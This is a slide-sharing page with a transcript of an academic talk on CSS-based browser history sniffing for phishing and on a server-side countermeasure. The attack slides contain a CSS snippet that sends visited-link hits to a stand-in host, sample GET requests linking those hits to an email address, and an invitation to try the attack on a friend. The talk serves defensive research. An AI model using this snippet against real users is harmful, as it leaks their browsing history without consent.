Invasive Browser Sniffing and Countermeasures

Slides:



Advertisements
Similar presentations
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Advertisements

Adding New User to Existing Dell Partner Account
Reporter: Jing Chiu Advisor: Yuh-Jye Lee /7/181Data Mining & Machine Learning Lab.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
PHAD- A Phishing Avoidance and Detection Tool Using Invisible Digital Watermarking By Sonali Batra Web 2.0 Security and Privacy 2014.
Stronger Password Authentication Using Browser Extensions Blake Ross, Collin Jackson, Nick Miyake, Dan Boneh, John Mitchell Stanford University
Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.
Accounting & Billing System for the WEB Centre GDP 19 Donna Crawford (dc899) Chris O’Neill (ckjon101) Amit Shah (ams401) David Newman (drn101) Supervisor.
Delayed Password Disclosure Mutual Authentication to Fight Phishing Steve Myers Indiana University, Bloomington Joint work with: Markus Jakobsson Indiana.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
The OWASP Foundation OWASP Chennai Phishing.
Norman SecureSurf Protect your users when surfing the Internet.
Telnet/SSH: Connecting to Hosts Internet Technology1.
1 Networks, advantages & types of What is a network? Two or more computers that are interconnected so they can exchange data, information & resources.
CSC 386 – Computer Security Scott Heggen. Agenda Authentication.
Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm.
KAIST Web Wallet: Preventing Phishing Attacks by Revealing User Intentions Min Wu, Robert C. Miller and Greg Little Symposium On Usable Privacy and Security.
Postacademic Interuniversity Course in Information Technology – Module C1p1 Contents Data Communications Applications –File & print serving –Mail –Domain.
XP New Perspectives on Browser and Basics Tutorial 1 1 Browser and Basics Tutorial 1.
Adam Soph, Alexandra Smith, Landon Peterson. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details.
Architecture Planning and designing a successful system Use tried and tested techniques Easy to maintain Robust and long lasting.
CSC-682 Advanced Computer Security Analyzing Websites for User-Visible Security Design Flaws Pompi Rotaru Based on an article by : Laura Falk, Atul Prakash,
Internet and Social Media Security. Outline Statistics Facebook Hacking and Security Data Encryption Cell Phone Hacking.
Web Spoofing Steve Newell Mike Falcon Computer Security CIS 4360.
CS395 Internship Melanie Tarr. Company Overview Midwives and patients informally tied towels together, giving one end to the laboring woman and the other.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
We will cover in this lecture A first look at issues related to Security Maintenance Scalability Simple Three Tier Architecture Module Road Map Assignment.
BY : MUHAMMAD KHUZAIMI B. ISHAK 4 ADIL PUAN MAZITA INFORMATION AND COMMUNICATION OF TECHNOLOGY.
NA-MIC National Alliance for Medical Image Computing UCSD: Engineering Core 2 Portal and Grid Infrastructure.
BeamAuth : Two-Factor Web Authentication with a Bookmark 14 th ACM Conference on Computer and Communications Security Ben Adida Presenter : SJ Park.
Activity 4 Protecting Ourselves. Keeping Safe There are lots of different ways we can be at risk on the Internet. How can we protect ourselves and keep.
Web Browsing *TAKE NOTES*. Millions of people browse the Web every day for research, shopping, job duties and entertainment. Installing a web browser.
1 Utkarsha MishraCOMPSCI 725 David Silver, Suman Jana, Eric Chen, Collin Jackson, and Dan Boneh. “Password Managers: Attacks and Defenses.” In Proceedings.
Distributed Systems Ryan Chris Van Kevin. Kinds of Systems Distributed Operating System –Offers Transparent View of Network –Controls multiprocessors.
Advanced Guide to ing. Introduction In this guide you and explain will learn how to use ing in an advanced way. I will go through on.
E-Commerce & Bank Security By: Mark Reed COSC 480.
Stuff to memorise… "A method tells an object to perform an action. A property allows us to read or change the settings of the object."
Robert Crawford, MBA West Middle School.  Describe ways criminals obtain passwords  Discuss ways to protect your computer from being accessed by others.
Stuff to memorise… "A method tells an object to perform an action. A property allows us to read or change the settings of the object."
Kamdhenu Website is used to Add agent in Kamdhenu offer under Group head Pfiger Software Technologies Pvt. Ltd.
Testing and delivery Web design principles. Web development is software development.
BRANDING YOURSELF FINAL DRAFT.
CSCI 392: Seminar in Computing and Society
IT Security  .
CISC103 Web Development Basics: Web site:
By: Nick Doyle Aaron Haas Devin Johnson
The Internet.
Chapter 17 Risks, Security and Disaster Recovery
Server Concepts Dr. Charles W. Kann.
Sarang Nazari California State University, Los Angeles
By Janet Crawford and Dam Luong Submitted to the Faculty of
Whether you decide to use hidden frames or XMLHttp, there are several things you'll need to consider when building an Ajax application. Expanding the role.
Phishing is a form of social engineering that attempts to steal sensitive information.
Internet Applications
Cross-Site Request Forgeries: Exploitation and Prevention
Telnet/SSH Connecting to Hosts Internet Technology.
CISC103 Web Development Basics: Web site:
Automatic and Precise Client-Side Protection against CSRF Attacks
Provide Real-Time Appointment Status & Improve Patient Satisfaction
Riding Someone Else’s Wave with CSRF
Lecture 3: Secure Network Architecture
Serpil TOK, Zeki BAYRAM. Eastern MediterraneanUniversity Famagusta
International Scholar Dossier Training
Unemployment Insurance Agency Michigan Web Account Manager
INTERNET APPLICATIONS
Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
Web Servers (IIS and Apache)
Computer Networks Protocols
The Internet and Electronic mail
Week 7 - Wednesday CS363.
Presentation transcript:

Invasive Browser Sniffing and Countermeasures Markus Jakobsson Sid Stamm Phishing overview Symantec says phishing attacks up by 81 per cent in first half of 2006 The main goal of attacks is to secure confidential information like passwords, login information,ハand addresses to be able to meddle in peopleユs financial affairs # sites (recorded by apwg) in july 2006: 14191

His wife Hurry up! His bank His conscience

He performed such a transaction ACH transfer … nice for phisher!

First things first: How does the phisher know his wife’s name? Jagatic, Johnson, Jakobsson, Menczer, “Social Phishing”, To appear in CACM, available at http://www.stop-phishing.com

And then: How does the phisher know where he has been? What you see: The Code: <style> a { color: blue; } #id1:visited { color: red; } #id2:visited { color: red; } #id3:visited { color: red; } </style> <a id=id1 href=“x.com”>Link 1</a> <a id=id2 href=“y.com”>Link 2</a> <a id=id3 href=“z.com”>Link 3</a> Link 1 Link 2 Link 3

And then: How does the phisher know where he has been? Not visible: The Code: <style> a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); … </style> <a id=id1 href=“x.com”></a> <a id=id2 href=“y.com”></a> <a id=id3 href=“z.com”></a> Link 1 Link 2 Link 3

Architecture of this attack ? Attack is as old as Feb. 2002: http://seclists.org/bugtraq/2002/Feb/0271.html Reported recently at Open Web Application Security Project OWASP (9/21/2006) by Jeremiah Grossman (from WhiteHat Security)

Connecting to email address GET /?IAM=alice@x.com (lots of links) Phisher can now associate Alice with link 1 and 42 GET /hit?id=1&IAM=alice@x.com Additionally, email address can be obtained through the auto-fill field extraction (see Fil’s riddle site) GET /hit?id=42&IAM=alice@x.com

Try it? Try it on a friend? browser-recon.info

Where can this be stopped? User paranoia (clear all) Our approach Jackson, Bortz, Boneh, Mitchell

Server-side defense against browser sniffing Principle I: Avoid correct guesses! www.chase.com/page.html?gr4450_ooP)+ Principle II: Cause false positives! add wamu.com, citi.com, etc etc. Entry point pollution consists of all entry points (the anonymity set). • POLLUTION DOES NOT require effort by client, can be done behind-the-scenes

Server-side defense against browser sniffing Principle I: Avoid correct guesses! But what about the portal? Principle II: Cause false positives! But what if they are all stigmatizing?

Translating Proxy T SB GET /?13fc021b ST GET / C Domain of S Now we implement a “Layer” on top of the server, called a Translator. IDEALLY: the two would be on one computer communicating via Loopback interface or other mechanism. WHY: so S_B doesn’t have to change, prevent site programming mistakes, etc C Domain of S

Experimental data

What I have not mentioned How do we deal with robot policies? What about search engines, proxies? How do we select false positives? What about links to off-site data? How do we handle bookmarks? What does the prototype do? Please see the paper!

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.